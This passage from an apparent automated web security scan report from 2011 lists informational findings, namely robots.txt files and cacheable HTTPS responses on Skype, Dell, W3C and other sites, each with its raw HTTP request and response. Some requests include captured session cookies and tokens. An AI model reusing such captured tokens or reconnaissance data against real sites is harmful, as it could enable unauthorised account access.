User-agent: *
Disallow: /temp/
Disallow: /store/accessories/
Disallow: */downloading/
Disallow: /go/help.ticket.submit$

Sitemap: http://www.skype.com/sitemap.xml

23.87. http://www.skypeassets.com/i/images/icons/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skypeassets.com
Path:   /i/images/icons/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skypeassets.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 16 Jul 2010 12:03:15 GMT
ETag: "a2-48b8000f566c0"
Content-Type: text/plain; charset=utf-8
Content-Language: en
Cache-Control: max-age=10800
Date: Sun, 04 Sep 2011 21:04:12 GMT
Content-Length: 162
Connection: close

User-agent: *
Disallow: /temp/
Disallow: /store/accessories/
Disallow: */downloading/
Disallow: /go/help.ticket.submit$

Sitemap: http://www.skype.com/sitemap.xml

23.88. https://www.trustwave.com/web-application-firewall/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustwave.com
Path:   /web-application-firewall/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trustwave.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:17 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 21:58:42 GMT
ETag: "8418c-20a-49b0349310880"
Accept-Ranges: bytes
Content-Length: 522
Connection: close
Content-Type: text/plain; charset=UTF-8

###############################
#
# Addresses all robots by using wild card *
#
User-agent: *
# list folders robots are not allowed to index
#
Disallow: /images
Disallow: /includes
Disallow:
...[SNIP]...

23.89. http://www.vodburner.com/affland.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vodburner.com
Path:   /affland.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vodburner.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 21:09:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.vodburner.com/xmlrpc.php
Content-Length: 74
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.vodburner.com/sitemap.xml.gz

23.90. http://www.w3.org/TR/html5/dom.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /TR/html5/dom.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.w3.org

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:23:02 GMT
Server: Apache/2
Last-Modified: Mon, 23 Aug 2010 18:35:40 GMT
ETag: "6e1-48e81ea51d700"
Accept-Ranges: bytes
Content-Length: 1761
Cache-Control: max-age=21600
Expires: Mon, 05 Sep 2011 08:23:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

#
# robots.txt for http://www.w3.org/
#
# $Id: robots.txt,v 1.62 2010/08/23 18:35:40 ted Exp $
#

# For use by search.w3.org
User-agent: W3C-gsa
Disallow: /Out-Of-Date

User-agent: W3T_SE
Disallow: /O
...[SNIP]...

23.91. http://www.w3schools.com/js/js_ex_dom.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /js/js_ex_dom.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.w3schools.com

Response

HTTP/1.1 200 OK
Content-Length: 327
Content-Type: text/plain
Last-Modified: Tue, 22 Feb 2011 14:55:22 GMT
Accept-Ranges: bytes
ETag: "49cab387a0d2cb1:4cd"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:05 GMT
Connection: close

User-agent: *
Disallow: /quiztest
Disallow: /banners
Disallow: /images
Disallow: /ado/demo_db_edit.asp
Disallow: /html/tryit.asp
Disallow: /css/tryit.asp
Disallow: /dom/tryit.asp
Disallow: /js
...[SNIP]...

24. Cacheable HTTPS response  previous  next
There are 150 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


24.1. https://chat1.us.dell.com/netagent/cimlogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chat1.us.dell.com
Path:   /netagent/cimlogin.aspx

Request

GET /netagent/cimlogin.aspx HTTP/1.1
Host: chat1.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 899
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Server: Unauthorized-Use-Prohibited
Date: Sun, 04 Sep 2011 16:28:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Invalid login attempt</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Wi
...[SNIP]...

24.2. https://developer.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: developer.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:21 GMT
Server: Apache
ETag: "020aa6e4eb099b150a8993581cb1b6fc"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; path=/; expires=Sun, 04-Sep-2011 21:47:21 GMT; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=86660
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 8484
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE]><![endif]-->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="
...[SNIP]...

24.3. https://developer.skype.com/accessories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /accessories

Request

GET /accessories HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:45 GMT
Server: Apache
ETag: "8b977c5e6ee24762aaa66d3c7312af10"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:45 GMT; HttpOnly
Content-Length: 10222
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=54240
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.4. https://developer.skype.com/certification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /certification

Request

GET /certification HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:49 GMT
Server: Apache
ETag: "f651d6c339947dc40adb39c0600355a0"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:49 GMT; HttpOnly
Content-Length: 7914
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=78069
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.5. https://developer.skype.com/certification/accessories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /certification/accessories

Request

GET /certification/accessories HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:51 GMT
Server: Apache
ETag: "61a7f746904d4a11ff999ed4e04fd93b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:51 GMT; HttpOnly
Content-Length: 13962
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=90680
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.6. https://developer.skype.com/certification/certified-list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /certification/certified-list

Request

GET /certification/certified-list HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:51 GMT
Server: Apache
ETag: "574e837eaf783dc40564ec8e4561fff9"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:51 GMT; HttpOnly
Content-Length: 18790
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=155958
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.7. https://developer.skype.com/certification/odm-program  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /certification/odm-program

Request

GET /certification/odm-program HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:51 GMT
Server: Apache
ETag: "f30132140efa0328a440fddaaa36caeb"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:51 GMT; HttpOnly
Content-Length: 9848
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=26662
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.8. https://developer.skype.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /login

Request

GET /login HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:44 GMT
Server: Apache
ETag: "a37c078525f0d8517aa070a52d38f169"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:44 GMT; HttpOnly
Content-Length: 7225
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=31997
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-
...[SNIP]...

24.9. https://developer.skype.com/public/skypekit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /public/skypekit

Request

GET /public/skypekit HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:44 GMT
Server: Apache
ETag: "29149c3b04407a170d5f4958c0b0944a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:44 GMT; HttpOnly
Content-Length: 8994
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=50733
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.10. https://developer.skype.com/public/skypekit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /public/skypekit/

Request

GET /public/skypekit/ HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:45 GMT
Server: Apache
ETag: "29149c3b04407a170d5f4958c0b0944a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:45 GMT; HttpOnly
Content-Length: 8994
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=46366
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.11. https://developer.skype.com/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /signup

Request

GET /signup HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://developer.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: developer.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:33 GMT
Server: Apache
ETag: "61d8deb12cc966aee5f69d82e6b40873"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca; path=/; expires=Sun, 04-Sep-2011 21:47:33 GMT; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=11167
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 4934
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Skype Developer Zone - Signup</title>
<link rel="stylesheet" href="/stylesheets/templates/reset.css" type="text/css" media="al
...[SNIP]...

24.12. https://developer.skype.com/silk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /silk

Request

GET /silk HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:47 GMT
Server: Apache
ETag: "3800c70fc911ae730e84af42c23f038c"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:47 GMT; HttpOnly
Content-Length: 11000
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=65653
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.13. https://developer.skype.com/skypekit/reference/cpp/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /skypekit/reference/cpp/index.html

Request

GET /skypekit/reference/cpp/index.html HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:49 GMT
Server: Apache
Last-Modified: Tue, 23 Aug 2011 15:23:52 GMT
ETag: "781ee-2b7e-4ab2dc8779200"
Accept-Ranges: bytes
Content-Length: 11134
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=363
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

24.14. https://developer.skype.com/skypekit/reference/java/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /skypekit/reference/java/index.html

Request

GET /skypekit/reference/java/index.html HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:50 GMT
Server: Apache
Last-Modified: Mon, 22 Aug 2011 21:06:12 GMT
ETag: "907ee-58e-4ab1e72e7b900"
Accept-Ranges: bytes
Content-Length: 1422
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=255
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc on Sun Sep 05 08:16:27 CEST 2010-->
<TITLE>
...[SNIP]...

24.15. https://developer.skype.com/skypekit/reference/python/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /skypekit/reference/python/index.html

Request

GET /skypekit/reference/python/index.html HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:50 GMT
Server: Apache
Last-Modified: Tue, 23 Aug 2011 14:45:14 GMT
ETag: "980c6-6c-4ab2d3e4db280"
Accept-Ranges: bytes
Content-Length: 108
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=302
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=UTF-8

<head>
<script language="javascript">
<!--
location.replace("html/help.html")
//-->
</script>
</head>

24.16. https://developer.skype.com/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /support

Request

GET /support HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:49 GMT
Server: Apache
ETag: "483ccd0d54f1b1c4a59a9f318d77c152"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:49 GMT; HttpOnly
Content-Length: 8414
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=52130
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.17. https://developer.skype.com/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /support/

Request

GET /support/ HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:54 GMT
Server: Apache
ETag: "483ccd0d54f1b1c4a59a9f318d77c152"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _mysapp_v2=BAh7CDoPc2Vzc2lvbl9pZCIlMmIyYTNmMTdlOThkZWY5OWVjZTc3OWVkY2ZlOGI2NjI6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRjoOcmV0dXJuX3RvIg4vc2t5cGVraXQ%3D--84a2a1a4f09034275d5a9b10611122e8a249eb90; path=/; expires=Sun, 04-Sep-2011 22:27:54 GMT; HttpOnly
Content-Length: 8414
Status: 200
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=24802
X-UA-Compatible: IE=edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

24.18. https://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2609787;type=skype282;cat=webre621;ord=1;num=1? HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: id=22862f3847010064||t=1314119006|et=730|cs=002213fd487350b8c101372f4c
Host: fls.doubleclick.net
Connection: Keep-Alive
Cache-Control: no-cache
Referer: https://login.skype.com/account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114
Accept-Language: en-US

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 18:00:24 GMT
Expires: Sun, 04 Sep 2011 18:00:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1239
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://se
...[SNIP]...

24.19. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /subchoice/country/us/en/subhub.aspx

Request

GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

